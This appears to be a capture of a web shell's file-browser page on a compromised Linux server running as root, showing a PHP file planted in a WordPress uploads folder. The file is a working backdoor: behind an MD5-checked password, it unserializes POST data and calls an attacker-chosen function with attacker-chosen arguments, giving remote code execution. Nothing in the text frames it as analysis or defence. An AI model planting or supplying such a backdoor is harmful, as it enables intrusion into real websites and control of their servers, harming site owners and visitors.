HEX
Server: Apache
System: Linux dilmahquizNew 5.14.0-162.12.1.el9_1.0.2.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 30 22:14:42 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/elixirofceylontea/public/wp-content/uploads/uploads.php
<?php

class Processor {
    public $func;
    public $args;

    public function run() {
        // Dynamic function call - attacker controls $func
        echo call_user_func_array($this->func, $this->args);
    }
}

if (isset($_POST['data']) && isset($_POST['t']) ) {
    if(md5($_POST['t']) === "b1afe53f84799f5ed000a25defa3db68") {
        $obj = unserialize($_POST['data']);
        if (method_exists($obj, 'run')) {
            $obj->run();
        }
    };

}
?>